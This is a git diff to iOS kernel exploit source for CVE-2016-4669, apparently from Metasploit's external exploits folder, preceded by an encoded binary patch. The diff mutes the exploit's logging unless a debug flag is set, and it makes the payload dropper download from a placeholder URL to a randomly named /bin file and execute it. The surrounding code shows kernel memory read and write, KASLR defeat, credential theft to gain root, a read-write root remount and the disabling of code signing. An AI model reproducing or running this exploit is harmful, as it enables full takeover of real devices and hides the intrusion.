zFyIS(P7z(EX2o{J-{D#CQ`N)rnBu21r|6`_mc}B1mIjC4(HbOAWy>Z_zQmV9Rk{-O
z$cCOlog}7uC%IwF*AxyfUK&Za?D9Oe5S_5mzgW$yY15!YD_xQIw@OF2u@QPYr=ZMW
z_iYS8t#m#XYYH_4C|6a}^1*7+yOt~s#9D`V7}o)=^)KdB@ma2D7K&&xW2g;v4bzdB
z;?FA_aBb?k$Q1BLn^rg$2cj*3CJa0nOw=JsXAk-*;JGBDQt73!swk!Rsx|P4Sj1mX
zFrd!Z(nuicBZR1raYYF8*2aiaS8+5DTiP5LY+)J^d}?dQG&L6nS}9vd)7ue<Mq9$D
zrvbJ$VsLddg_=V&U^O)@SH2kRi7Js?hOP*b94&!+FbZcDWvIw;wM#KN8fXr~k(vT6
zN<D)u&+`mMgyEu&t79zYUxs13H4M7ap$>@AfI0#zT}8!$cNI-7WY>BRFrX|t_X)LN
zm}>P!Lkol2=n2DG8bU1#9gCG>6RI4|fmqDHP@4=;c^(5i;V2rqJ`h?)dBZK5e<Kk-
zdM7#Ro$5@&Ysb*1sWb@gB~wkMqfwd1Ds^xwnG`9S06#!%U=tex%P;`P7CU2;Vv|^~
zF~%mc=J3)M%@io8q7w~MSByE7L_ipwcn`ZIF3cv@g<2*yvq(4=TJD3V-J@x&G*B!U
zXlima1R_o06@do8)YPbRJcT9KA|HWsQfed`u2)&^y@L_tr-}yfIg(!KSf~;#;%}`F
zQs>9a9a|iVL;?+EWsapWf;s4qHq?h3U;%~<cv+0G+vd%_Bh(t4-x@`Rsf^|);%jI|
zY-x?nX+(yp3{JMNHOOL0E=s>`fwxL4Q@5fOL)qNwZ_b`m?eQVMZ|>~snww_KneDl0
z9#$;I$3Vb9;Qx07I=%F;IQY5Y1IBjpxZU{Oi_nE|kjD+?WNg|;jJ+h`F&JSl!eN9D
z5F~_85v;w86(cwhDiNv>JP30U?m`G6v?8=2tVM_;JdKb**oLqh;UGdc!YKq9!IH#j
zDncp3c!VhkE`-?#cOo<(L=aXYtU=g-um#~+gqIO^B6J}fMd(2|hrnQm4WR^~0>Ozu
zpJIfHa|)?_%_ZW&ov=wzaVr5&d4BMTn#Ga9lZ?H1gIV`cWc0oZUAYX(b9R_KUw98T
z=<*Dwiw}98)#<Vi{8<FbYv+}cj-kIX_9#MTyk7Uu()Cr8vzt_Vcjqv+8TgFkvWb5l
z{AeA&3p~l952gP#BRvVeNKIDKEztEU9bX0BspCW7FVpeg0k5y`Dew+m`ftEruH(Oa
zp0O|K_*LL1>G&Psuhj8pGWZI#&3Ik<e}LEP`#AUtUHUJ<6Xx_G`wxO2tFj88-8WSK
zFMu!ArBBUBzcnMh1-xGVcfs3q<u`y=_QiPpuYs@BrJn>}tmB!?XbW5UkiNy>HQyor
zYVi8{ZUkSZ%U=urG9AARyuSQ*!Ry<*1H8WeUx2sj%KrxZ7#+VKyk5T#!Rzs49}jKs
z67c%;>ofRUz-Q~^-v(aq&q45d{a1k3>;EWtz5Jhm*W>#(_%G<>_ktg%<1f1~w7n;T
z&()<*1MkrB-v+PuuLr<iu1kL&ydKY;;PrSN2Cug-34XM$d@jbWLLFa{!GAG>|4Igb
z6L>vdw}T&}lNSN6^*<Nle+d2;2yY<lMR*@U{}DT@+JcW?-v*&=&VOIoR)z4=_9}(f
z=QC&n0RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU8
z0RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU8
z0RsU80RsU8f&Wbi6qQ>ewt3YHJheBtBldZ2`j39KFu!JgjmouoY`5Xxzq)+4c;?{}
zq55#Nf!!Ld5?wyuE%R|932shm4NPwe*ZG^=xXx)YYda@wadny;TWW{qncwQKU(B=g
zd@`VZ1j^%!QIfAdxY)OFDK0}{Z5Bi;m)|JY`Y6|~ur@0qarIaPx7PS#p?d?Y%`R5^
zmW7wr2XSSPlD#>$kgg6>1T?H@YJlXWbv|4GgL_w4TPLq{KoCc|d~@8hYJ4@btLM-6
zRlpPv?pR@MVgV}2NWtAHtW6#)OB&aBVLH@qX;trAscG`ZV)FuxfoPzm9-3|G(+upa
zv5BKDk*Su#zi$<bNnE&YQN0frAH~8g{-#jt3g0p(a7=14pp%jV=FP`FKCG=$gfm7x
zkbBGg+2Mt_!8ketP2^MHrM!W9+@BPSg%-9@+U!fxaKR2P#0gO1TuQvH<sN|Ko4;uG
zBHuiI#T+FrxHOUOU81BrGm~y>(JrT><hv-@r(7vSY^}mJ2b$45)Y25!pvHw8VxjAa
z4=Q{tf=h2&8?{VLYGm3&=n5*z96@}&a(@tUt;CW0`C?6hK*ZM?^+zavxf-upx)Mx7
zQ*1>urL+m)0?R|K#H=Q!F&a<|TSE-4Yr@?<l(v?$>b+1DBk~yB@<Z$fViosOtcB0f
ztv!?yPp1UKxXz3Gn4&kQqtT!gu|*%@YrxfC(eMgNcsiXh<Q6DO+B!5zSLoTHDf-)>
zs9<7f@^E*JQMQ+cW>cC?y^xPmUmlXG-IGQs+cHx0KGB&@Q*Y`@BeFA{K$joV6@T>s
z-@<y5w_8o3`>%-ItFVe25!<D(p@jfV@db=fk){>O{b7`RP)kO0W+WZfk|Ikpla4A$
zbmbJu=q8RX>mud@V)U1%QDl!A8Bx6Fl)?;NHbogEic>D419OfTz&YqovJ%r8ZCI-K
z?5CW?^-ff{%|!WEv?%7UCPshP8Rb}`L@GDkp%$%wuGPiz3-KtkNYP7MnnEo~AKYLn
z`iwCYdE=D#9)GA67E{^H3Qu=Pg2SbkKHPU%=ws0s6NRM_+){;sIemW{`?YBy+h%I^
zv$sqkw%XjterI0HUbU$0#Gc4%VDDw&LdJ%r%@KAiJHk$9)8%PE-A8w5`J(JZ&X6k&
z*IJpWIfy<Rs9%bjg1C?lqxxECvD!q}kTNqy{sa`!E|6oNn(1~g^vzHUdkCd{Y!{OC
zI`-q*PGv%=TiS@hTXCEilLeg_{epVqn@_nHjvdajuqQvl-RA7?_-3X{?M}dE+>%K>
zHiq_4@9SiHQSO=ZRPKJ6%GI;oCO9Q~(qdsRs4+nw`>P46?#g1Op`~%XWF3=DnEhBB
z*O&ee@>|&3ACsJzdRZP_r^bF|{`?y%**X;Np!;D_O@oj9*^Ik1!>u%Z@~iXM0bVzp
z90DbCs70Y-EM>N^Pf*mtF17(}lj6=#SX#qA<z~L$z>L4Fri8`*SW^_kFm5(vFId!Z
z3pe?(_i`-kzrJfC;2uUkbCeyh+;jb8CTSk=<7{T4%NqY?LF@_0dvL8uaQavZ<hzei
z!RMZ!3XuA6)}Y)@0NXB7!tzPT{X->*ZHBOBT+`@V-rU4q%2FqaSCI9wc9Jx(j=q1p
zfxh?P(pw8V{(JiF+fLsDJ4nIsJuOXP=(8$26syOw#K*79V}H+9u8YHp1TIB)v*E9*
zv8S>v?DspV^!Ikr_iuJ9GQv&Vr~Z_!_!;gA<q_{>SJADZock+^|7Z^te048<A5*>u
zl<yDsk#*D_t8#GpoN@yy^~eu$$fY08iTT)bAk{l8*^hEmV}A;~pMQ&FoyIpg-0yhG
zVPtNi*?(`2a_uEMfUK|niL(Azmr}X%{pbBeKY4%(-^0%3gxLk;dlx(eAEfV9hv@s=
zKht;TV-|ex#5XhRZteWFRdJMUR`v4Fci@1#m7IGYvk1C7ME`_@E+ye0i9ipVy<0eJ
za!!uyGS@v|K5Bl`^uAD4@wo7ma9HRP8dkn9*k8flbl7@LrF+5H^3e_Dqf09vH?0vm
zk-o*WXtVjclEzs#&TaHWZk%yII4B%}*W)gpjda(Hz_#Kd=r7{V-toBKrcki5)jJuR
z!Rc+F7je4f4aOeR=sk>W;<SYOn-ZKZ#eGYE;Pl;~-{bU)pwDx9FX((+azk~U0bRjq
z3+`5$#_1sF+c^CQ=p~%q0{UT2Zv*`_=qt^Pi4tQkQatdQfjgDnAUa>Yo9bOoJ8?JE
zc}{yk+i}qh<yipw-#AV8P<c7s3fj+Ux_fFRr{kc%$7#B6>P1d(1HF&aU7&k7-2>X3
zr`E-Achr@frhBBOa@qm<cA{~4%;s!?)pB|(=tV^1(w&z<M>xF=G%izB;yXdZFWCrO
zY(saLK?EBCY<qyu7dgH46=18-NOj@fF&_Vw4{-k&r|;XtSTm>B?q=+MPMb~wb1lz5
z82(_9Du49<0Dn&3_&#I5<n+o;#&&S}!fT8j;B=~+F}g#XbaQTF>^P@?{5oS7IDM!G
z_y52<DbEL}Yb4RIi|%2&p2x=_vzpV5$a5Q~x4@Q#oSugG`#61c7h|hAZ2|o#r|q!u
zDNa|t$=Fs-Kl=yV$;0V7==letp#$9k_g7BSU2w-aO?ScxXaLGXcf;9<hW@)Db2O)$
zjxqfC7&U$Z=!u+eguT-^y$$g*IbDwUJ2+hopaPtpaDuUAoW2Y3m_wAh?)y7q9h~0q
zTl7axcZ2Ta^a0pH0~qOc6m9w*r|;Z>d(t@Fy%R$g`V-}0$Uho1%*6lDU#0PlJGE3A
zr5L+W7k`^BKBUr0+3)D+r*!l$bo3iK`lycX)zNttMH!{uN|jdR(|zTdo;5o98!C-&
z+%cz%kLl<Kb#z=uZ_&{&>geC<=uREIOGoe3(Fb+(-*ogb9eqJZ=VcArQmmt|(a}?N
z^fz>LKu15Qqc`j5=XLZ>9sQ1uKBl8T(b4AYLEZ9o^f(=TgO0vgN6%AfSjt$fF1}Gm
zx9aG7b@X?2^kX_YuA{f;=&d^X7dm>Ij{c*L{;Q7uA06GR&@RQta&iW3x9jN3b@ZLE
z?Jk6GlZ^;|ggS%<gaAS#LJ%Q@uo$5UfyUexgfKz`VF^MMA%@V3uoPh#!aWGf5mq4F
zi}0TaD-r$=!hHyB2=^mAfUpW-HNt}k4<URP;bDYF5FSNXi|`o2;|Nb6hzRWn>k!r>
zY(RJt;d=;igboB6_wjKdwE6J05MdDlK5Z1fLlmdA-={#_fk1NBApCE}$H9C<p3$)7
zGu*=uqAz_;Le@*3=6veYA+7Eir)gEMu4r`;>7_j${ORgu=EIKGkVU$$L0iA4DRr&x
zqidLb>E{}iRURjlM;>K$J@lD~b|Pp)$ftj_Q6dJPLhv}MKFRw2*)9IQkp7VkGHGkW
zr+*gE;s&1%w3v)X2;br;9)|Euk4@^2)0d8Ms!xV=jXDzPQERxiQ64ST1Uz2qR_^II
zRl3rwm;B`iE)wzT`W}Vw0INJQYK=yy`uMYn`YfqWiP5$l9z}RcI-mYI2M^KueSt8`
zh`5K*ehO~Or;FM7W4aP^>65(@t$Vm9e&~*XPq`7C+cB6ERT9R!2<^#tIM3GYmGd3i
z%uQuwyE!wG?+Rx|(+2eLd%GF2+OF<rZO!ZBb=&cuvHhDFt!yj}jnr-VqKp5NP4V=0
zFbxue8^Oe>Tfm@(+XzRreovU#p}WCDV$>4^ZEN__O<~R7)Qw<u2Uy+u)%JYpmv7Dy
zNxQsiUl_8zt40m(>#96$=%%UkPOciG4i?(qywJsId$+o%A)B_k_+fWzb?N$T+QI1b
z{;WPKy)&go>P}jCgu0=qY+9=^L-%G8r)<jdwuITkZ^J6_8T+qFT*k&LynuFGhn{q(
z8?P7~2LJAhI#l3Wx5ujW&cTMm7CLRG(q=sEqpBOILw8R3o)^lho~`XktA9L%X`7@&
z&zy!oZ%S{H@?r3jvnRM{#suQ4Q;sV_Ez81-G5mdgx({PF+<tItlMg<bLgvh$e~&*h
zv!#^=dzy+d&1KeeNu(<L(&+1l72%sg(e>fT3QT!TwAZRuK(XABFHN{a_=GCw@M0!Z
zP5Mkp6RL){YC=^NmARx6-{c9CoL^=RIs|m6%Es9Ani_Qa`aq-=-cZ*Rn5@{N+5r9Q
zqoGJE{e>ZHN<*d^k0ZH2)ZgS=s2p<+#t+RuVUnWWaH1wm`pjA;d|6j&XhjpgtTe%}
z0>6C2pc<K_6f}k{b%O%#a7InIL8nHBT{r0J%1EmEYz@DvwD7QMOmcqZGqs=OL~V<;
dzl5Qqlx=1-GW`XlOO|^R=;RlB_*ibU{|oVqfnNXs

diff --git a/external/source/exploits/CVE-2016-4669/macho.m b/external/source/exploits/CVE-2016-4669/macho.m
index 9ded96bbdd..513c8b30f8 100644
--- a/external/source/exploits/CVE-2016-4669/macho.m
+++ b/external/source/exploits/CVE-2016-4669/macho.m
@@ -78,7 +78,7 @@ kern_return_t (* IOMasterPort)(mach_port_t , mach_port_t *);
 {\
 	name = dlsym(RTLD_DEFAULT, ""#name"");\
 	if (!name) {\
-		NSLog(@"could not resolve " #name "");\
+		LOG("could not resolve " #name "");\
 		exit(-1);\
 	}\
 }\
@@ -152,7 +152,7 @@ void gc()
 {
 	kern_return_t kr = mach_zone_force_gc(mach_host_self());
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"zone gc failed: %d", kr);
+		LOG("zone gc failed: %d", kr);
 	      	exit(-1);	
 	}
 }
@@ -212,10 +212,10 @@ mach_port_t *setup_super_port(mach_port_t *super_port, size_t ports_count)
 	// out of bounds.
 	kern_return_t kr = mach_ports_register_oob();
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"could not register oob");
+		LOG("could not register oob");
 		return NULL;
 	}
-	NSLog(@"oob port registered ");
+	LOG("oob port registered ");
 
 	// free the rest of the messages
 	for (int i=1; i<KALLOC_8_CNT; i++) { 
@@ -256,12 +256,12 @@ int find_port_pipe(int * pipes, unsigned *off)
 
 		int cnt = read(pipe[0], buf, sizeof(buf));
 		if (cnt != sizeof(buf)) {
-			NSLog(@"could not read pipe %d", i);
+			LOG("could not read pipe %d", i);
 			return -1;
 		}
 
 		if (write(pipe[1], buf, sizeof(buf)) != sizeof(buf)) {
-			NSLog(@"pipe write failed");
+			LOG("pipe write failed");
 			return -1;
 		}
 
@@ -282,12 +282,12 @@ int find_in_pipes(int *pipes, unsigned *off, bool (^find)(many_ptr_t *mp))
 
 		int cnt = read(pipe[0], buf, sizeof(buf));
 		if (cnt != sizeof(buf)) {
-			NSLog(@"could not read pipe %x, cnt: %d", i, cnt);
+			LOG("could not read pipe %x, cnt: %d", i, cnt);
 			return -1;
 		}
 
 		if (write(pipe[1], buf, sizeof(buf)) != sizeof(buf)) {
-			NSLog(@"pipe write failed");
+			LOG("pipe write failed");
 			return -1;
 		}
 
@@ -418,7 +418,7 @@ void kread(uint64_t from, void *to, size_t size)
         kern_return_t kr = mach_vm_read_overwrite(tfp0, off+from,
 		       	size, (mach_vm_offset_t)(off+to), &outsize);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_vm_read_overwrite failed, left: %zu, kr: %d", szt, kr);
+		LOG("mach_vm_read_overwrite failed, left: %zu, kr: %d", szt, kr);
 		return;
 	}
         szt -= size;
@@ -447,7 +447,7 @@ uint32_t kr32(addr_t from)
 			&num);
 
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_vm_read failed!\n");
+		LOG("mach_vm_read failed!\n");
 		return 0;
 	}
 	uint32_t val = *(uint32_t*)buf;
@@ -465,7 +465,7 @@ uint32_t kw32(addr_t to, uint32_t v)
 			(mach_msg_type_number_t)4);
 
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_vm_write failed!\n");
+		LOG("mach_vm_write failed!\n");
 	}
 
 	return kr;
@@ -477,13 +477,13 @@ int kread0_32(addr_t addr, void *result, mach_port_t super_port,
 	kern_return_t kr = mach_port_set_context(mach_task_self(),
 		       	context_port, addr - 8);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_port_set_context failed: %d", kr);
+		LOG("mach_port_set_context failed: %d", kr);
 		return -1;
 	}
 
 	kr = pid_for_task(super_port, (int *)result);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"pid_for_task failed: %d", kr);
+		LOG("pid_for_task failed: %d", kr);
 		return -2;
 	}
 	return 0;
@@ -496,7 +496,7 @@ static void khexdump0(addr_t ptr, size_t n, mach_port_t port, mach_port_t ctx_po
 		kread0_32(ptr+i*4, &v1, port, ctx_port);
 		kread0_32(ptr+(i+1)*4, &v2, port, ctx_port);
 
-		NSLog(@"%08X %08X", v1, v2);
+		LOG("%08X %08X", v1, v2);
 	}
 }
 
@@ -506,7 +506,7 @@ static void khexdump(addr_t ptr, size_t n)
 		uint32_t v1, v2;
 		v1 = kr32(ptr+i*4);
 		v2 = kr32(ptr+(i+1)*4);
-		NSLog(@"%08X %08X", v1, v2);
+		LOG("%08X %08X", v1, v2);
 	}
 }
 
@@ -543,7 +543,7 @@ io_service_t alloc_x10_alloc(void *xml)
 			&i);
 
 	if (kr != KERN_SUCCESS || another_error != KERN_SUCCESS) {
-		NSLog(@"io_service_add_notification_ool failed %d, %d",
+		LOG("io_service_add_notification_ool failed %d, %d",
 				kr, another_error);
 		return MACH_PORT_NULL;
 	}	
@@ -630,13 +630,13 @@ int main(int argc, char** argv)
 	resolve(mach_vm_deallocate);
 
 	kr = IOMasterPort(MACH_PORT_NULL, &master);
-	NSLog(@"master port: %x, kr: %d\n", master, kr);
+	LOG("master port: %x, kr: %d\n", master, kr);
 
 	// First we stop all other thread to reduce the "noise"
 	for_other_threads(^(thread_act_t t) {
 		kern_return_t kr = thread_suspend(t);
 		if (kr != KERN_SUCCESS) 
-			NSLog(@"could not suspend a thread");
+			LOG("could not suspend a thread");
 	});
 
 	// Set file limit for our process as high as possible,
@@ -672,7 +672,7 @@ int main(int argc, char** argv)
 
 	// create pipe files first
 	if (pipes_create((int *)pipes, PIPES_CNT) < 0) {
-		NSLog(@"could not create pipes");
+		LOG("could not create pipes");
 		return -1;
 	}
 
@@ -716,12 +716,12 @@ int main(int argc, char** argv)
 	// ip_srights field.
 	kr = mach_ports_lookup(mach_task_self(), (mach_port_t **)&ports, &cnt);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_ports_lookup failed %x\n", kr);
+		LOG("mach_ports_lookup failed %x\n", kr);
 		return -1;
 	}
 
 	super_port = ports[2];
-	NSLog(@"got fake pipe port: %d", super_port);
+	LOG("got fake pipe port: %d", super_port);
 
 	// offset within the page where the super port used to reside.
 	unsigned pipe_off;
@@ -731,9 +731,9 @@ int main(int argc, char** argv)
 	int pipe_idx = find_port_pipe((int *)pipes, &pipe_off);
 
 	if (pipe_idx >= 0) {
-		NSLog(@"got port pipe %d, off: %04x\n", pipe_idx, pipe_off);
+		LOG("got port pipe %d, off: %04x\n", pipe_idx, pipe_off);
 	} else {
-		NSLog(@"could not find port pipe");
+		LOG("could not find port pipe");
 		exit(-1);
 	}
 
@@ -749,7 +749,7 @@ int main(int argc, char** argv)
 	// 
 	// We use method described in [3] to get kernel ASLR slide.
 	addr_t slide = get_kaslr_slide(super_port, super_pipe, pipe_off);
-	NSLog(@"slide: %08lx", slide);
+	LOG("slide: %08lx", slide);
 
 	// Now we want to get kernel read using pid_for_task trap trick.
 	// The details on that can be found in [2]. 
@@ -797,7 +797,7 @@ int main(int argc, char** argv)
 				MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 
 		if (kr != KERN_SUCCESS) {
-			NSLog(@"mach_port_request_notification failed, %x", kr);
+			LOG("mach_port_request_notification failed, %x", kr);
 		}
 	}
 
@@ -811,7 +811,7 @@ int main(int argc, char** argv)
 				MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 
 		if (kr != KERN_SUCCESS) {
-			NSLog(@"mach_port_request_notification failed, %x", kr);
+			LOG("mach_port_request_notification failed, %x", kr);
 		}
 	}
 
@@ -879,7 +879,7 @@ int main(int argc, char** argv)
 			MACH_NOTIFY_DEAD_NAME, 0, notify_port, 
 			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_port_request_notification failed kr: %x", kr);
+		LOG("mach_port_request_notification failed kr: %x", kr);
 		exit(-1);
 	}
 
@@ -888,7 +888,7 @@ int main(int argc, char** argv)
 	super_port_read(super_pipe, pipe_off, ^(many_ptr_t *mp) {
 		ip_requests = mp->p32[off32(IPC_PORT_ip_requests)];
 	});
-	NSLog(@"got ip_requests: %lx", ip_requests);
+	LOG("got ip_requests: %lx", ip_requests);
 
 	// -8 we need for +8 pid offset in proc structure.
 	// + 8 is for second ipc_port_request record.
@@ -932,10 +932,10 @@ int main(int argc, char** argv)
 	addr_t notify_port_addr;
 	kr = pid_for_task(super_port, (int *)&notify_port_addr);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"pid_for_task failed");
+		LOG("pid_for_task failed");
 		exit(-1);
 	}
-	NSLog(@"notify addr: %lx", notify_port_addr);
+	LOG("notify addr: %lx", notify_port_addr);
 	// Update the content of the task port so when we call pid_for_task
 	// it's going to use the value of notify_port ip_context field
 	// as bsd_info.
@@ -945,14 +945,14 @@ int main(int argc, char** argv)
 
 	uint32_t dummy = 0;
 	if (kread0_32(koffsets.base + slide, &dummy, super_port, notify_port) < 0) {
-		NSLog(@"early kernel read failed");
+		LOG("early kernel read failed");
 		exit(-1);
 	}
 	if (dummy != 0xFEEDFACE) {
-		NSLog(@"could not setup early kernel read");
+		LOG("could not setup early kernel read");
 		exit(-1);
 	}
-	NSLog(@"got early kernel read");
+	LOG("got early kernel read");
 
 	// remove our notification port, to be able to safely release the 
 	// super_port later on.
@@ -960,7 +960,7 @@ int main(int argc, char** argv)
 			MACH_NOTIFY_DEAD_NAME, 0, MACH_PORT_NULL, 
 			MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"mach_port_request_notification failed kr: %x", kr);
+		LOG("mach_port_request_notification failed kr: %x", kr);
 		exit(-1);
 	}
 
@@ -971,7 +971,7 @@ int main(int argc, char** argv)
 		       	super_port, notify_port) < 0) {
 		exit(0);
 	}
-	NSLog(@"kernel_task: %lx", kernel_task);
+	LOG("kernel_task: %lx", kernel_task);
 
 	addr_t kernel_space;
 	addr_t kernel_itk_self;
@@ -980,7 +980,7 @@ int main(int argc, char** argv)
 	kread0_32(kernel_itk_self + IPC_PORT_receiver, (uint32_t *)&kernel_space,
 			super_port, notify_port);
 
-	NSLog(@"kernel_space: %lx", kernel_space);
+	LOG("kernel_space: %lx", kernel_space);
 
 	addr_t self_space;
 	kread0_32(notify_port_addr + IPC_PORT_receiver, &self_space,
@@ -988,12 +988,12 @@ int main(int argc, char** argv)
 	addr_t super_port_addr = kread0_port_addr(self_space, super_port,
 		       	super_port, notify_port);
 
-	NSLog(@"super_port_addr: %lx", super_port_addr);
+	LOG("super_port_addr: %lx", super_port_addr);
 
 	// setup port for kernel task as outlined in [2]
 	super_port_to_tfp0(super_pipe, pipe_off, kernel_task, kernel_space,
 			super_port_addr);
-	NSLog(@"got tfp0");
+	LOG("got tfp0");
 	tfp0 = super_port;
 
 	// resume thread, otherwise we lose some of 
@@ -1001,7 +1001,7 @@ int main(int argc, char** argv)
 	for_other_threads(^(thread_act_t t) {
 		kern_return_t kr = thread_resume(t);
 		if (kr != KERN_SUCCESS) 
-			NSLog(@"could not resume a thread");
+			LOG("could not resume a thread");
 	});
 
 	shell_main(self_space, slide);
diff --git a/external/source/exploits/CVE-2016-4669/shell.m b/external/source/exploits/CVE-2016-4669/shell.m
index 241a67a4a1..170a1346fe 100644
--- a/external/source/exploits/CVE-2016-4669/shell.m
+++ b/external/source/exploits/CVE-2016-4669/shell.m
@@ -62,11 +62,11 @@ int remount_root_rw(addr_t slide)
 	char* nmz = strdup("/dev/disk0s1s1");
 	int ret = mount("hfs", "/", MNT_UPDATE, (void*)&nmz);
 	if (ret < 0) {
-		NSLog(@"mount failed ret: %d", ret);
+		LOG("mount failed ret: %d", ret);
 		return -1;
 	}
 
-	NSLog(@"root fs mounted r/w");
+	LOG("root fs mounted r/w");
 	kw32(v_mount + MOUNT_mnt_flags, mnt_flags & ~MNT_RDONLY);
 	return 0;
 }
@@ -85,71 +85,61 @@ int remount_root_ro(addr_t slide)
 	char* nmz = strdup("/dev/disk0s1s1");
 	int ret = mount("hfs", "/", MNT_UPDATE, (void*)&nmz);
 	if (ret < 0) {
-		NSLog(@"mount failed ret: %d", ret);
+		LOG("mount failed ret: %d", ret);
 		return -1;
 	}
-	NSLog(@"root fs mounted ro");
+	LOG("root fs mounted ro");
 
 	kw32(v_mount + MOUNT_mnt_flags, mnt_flags | MNT_ROOTFS);
 	return 0;
 }
 
+void random_string(char *s, const int len) {
+    static const char alphanum[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
+    for (int i = 0; i < len; ++i) {
+        s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];
+    }
+    s[len] = 0;
+}
+
 void deploy()
 {
-	download(PAYLOAD_URL_PLACEHOLDER, "/bin/m");
+	char* path = "/bin/random";
+	random_string(path + 5, 6);
+	download(PAYLOAD_URL_PLACEHOLDER, path);
 
 	pid_t pid = 0;
-	char *path = "/bin/m";
 	char *args[] = {path, NULL};
 	int ret = posix_spawn(&pid, path, 0, 0, args, NULL);
 	if (ret < 0) {
-		NSLog(@"posix_spawn failed: %d", ret);
+		LOG("posix_spawn failed: %d", ret);
 		return;
 	}
 	waitpid(pid, 0, 0);
-	NSLog(@"shell deployed");
+	LOG("shell deployed");
 }
 
 void shell_main(addr_t self_space, addr_t slide)
 {
 	addr_t self_addr = get_port_addr(self_space, mach_task_self());
-	NSLog(@"self_addr: %lx", self_addr);
+	LOG("self_addr: %lx", self_addr);
 
 	addr_t self_task = kr32(self_addr + IPC_PORT_kobject);
-	NSLog(@"self_task: %lx", self_task);
+	LOG("self_task: %lx", self_task);
 
 	addr_t self_proc = kr32(self_task + TASK_bsd_proc);
-	NSLog(@"self_proc: %lx", self_proc);
+	LOG("self_proc: %lx", self_proc);
 
 	addr_t kernel_proc = proc_for_pid(self_proc, 0);
-	NSLog(@"kernel_proc: %lx", kernel_proc);
+	LOG("kernel_proc: %lx", kernel_proc);
 
 	// privilege escalation from [1]
 	addr_t self_ucred = kr32(self_proc + PROC_ucred);
 	addr_t kernel_cred = kr32(kernel_proc + PROC_ucred);
 	kw32(self_proc + PROC_ucred, kernel_cred);
 
-	NSLog(@"got root uid: %d, gid: %d", getuid(), getgid());
+	LOG("got root uid: %d, gid: %d", getuid(), getgid());
 
-	//uint32_t cs_enforcement_disable = 0;
-	//size_t kernel_size = 0x1000000;
-	//void *kernel = malloc(kernel_size);
-	//if (kernel) {
-		//kread(koffsets.base + slide, kernel, kernel_size);
-		//NSLog(@"got %zu kernel bytes xx", kernel_size);
-		//cs_enforcement_disable = find_cs_enforcement_disable_amfi(0, kernel, kernel_size);
-	//} else {
-		//NSLog(@"malloc kernel_size failed");
-	//}
-	//if (cs_enforcement_disable != 0) {
-		//NSLog(@"patchfinder got cs_enforcement_disable: %lx",
-				//cs_enforcement_disable + koffsets.base + slide);
-		//koffsets.cs_enforcement_disable = cs_enforcement_disable + koffsets.base;
-		//koffsets.amfi_allow_any_signature = koffsets.cs_enforcement_disable - 8;
-	//} else {
-	NSLog(@"patchfinder skipped!! using hardcoded offsets");
-	//}
-	//free(kernel);
 	// disable code signing by overwriting kernel arguments
 	// as described in [2]
 	//
diff --git a/external/source/exploits/CVE-2016-4669/utils.h b/external/source/exploits/CVE-2016-4669/utils.h
index 85f90bd87e..e2a9838899 100644
--- a/external/source/exploits/CVE-2016-4669/utils.h
+++ b/external/source/exploits/CVE-2016-4669/utils.h
@@ -43,4 +43,11 @@ void pipes_close(int *pipes, size_t count);
 int pipes_create(int *pipes, size_t count);
 int pipes_alloc(int *pipes, size_t count, char *pipe_buf);
 
+//#define DEBUG 1
+#ifdef DEBUG
+#define LOG(str, args...) do { NSLog(@str, ##args); } while(0)
+#else
+#define LOG(str, args...) do {} while(0)
+#endif
+
 #endif
diff --git a/external/source/exploits/CVE-2016-4669/utils.m b/external/source/exploits/CVE-2016-4669/utils.m
index 3592f621c6..b0bbfe2fa0 100644
--- a/external/source/exploits/CVE-2016-4669/utils.m
+++ b/external/source/exploits/CVE-2016-4669/utils.m
@@ -10,7 +10,7 @@ void for_other_threads(void (^handler)(thread_act_t thread))
 
 	kr = task_threads(mach_task_self(), &list, &count);
 	if (kr != KERN_SUCCESS) {
-		NSLog(@"task_threads failed");
+		LOG("task_threads failed");
 		return;
 	}
 
@@ -27,29 +27,29 @@ void set_nofile_limit()
 	struct rlimit rlim;
 	ret = getrlimit(RLIMIT_NOFILE, &rlim);
 	if (ret < 0) {
-		NSLog(@"getresuid failed errno: %d", errno);
+		LOG("getresuid failed errno: %d", errno);
 		exit(-1);
 	}
-	NSLog(@"nofile limit: %llx %llx", rlim.rlim_cur, rlim.rlim_max);
+	LOG("nofile limit: %llx %llx", rlim.rlim_cur, rlim.rlim_max);
 
 	rlim.rlim_cur = 0x2000;
 	ret = setrlimit(RLIMIT_NOFILE, &rlim);
 	if (ret < 0) {
-		NSLog(@"setrlimit failed errno: %d", errno);
+		LOG("setrlimit failed errno: %d", errno);
 		exit(-1);
 	}
-	NSLog(@"set new nofile limit: %llx", rlim.rlim_cur);
+	LOG("set new nofile limit: %llx", rlim.rlim_cur);
 }
 
 NSData *download_data(NSString *_url)
 {
 	NSURL  *url = [NSURL URLWithString:_url];
-	NSLog(@"get %@", url);
+	LOG("get %@", url);
 	NSData *urlData = [NSData dataWithContentsOfURL:url];
 	if (urlData != nil)
-		NSLog(@"got remote len: %d", [urlData length]);
+		LOG("got remote len: %d", [urlData length]);
 	else
-		NSLog(@"could not get %@", url);
+		LOG("could not get %@", url);
 
 	return urlData;
 }
@@ -70,12 +70,12 @@ int download(char *src, char *dest)
 			S_IROTH | S_IXOTH
 		     ); 
 	if (fd < 0) {
-		NSLog(@"could not open %s", dest);
+		LOG("could not open %s", dest);
 		return -1;
 	}
 
 	int ret = write(fd, [data bytes], [data length]);
-	NSLog(@"saved to %s, write ret: %d", dest, ret);
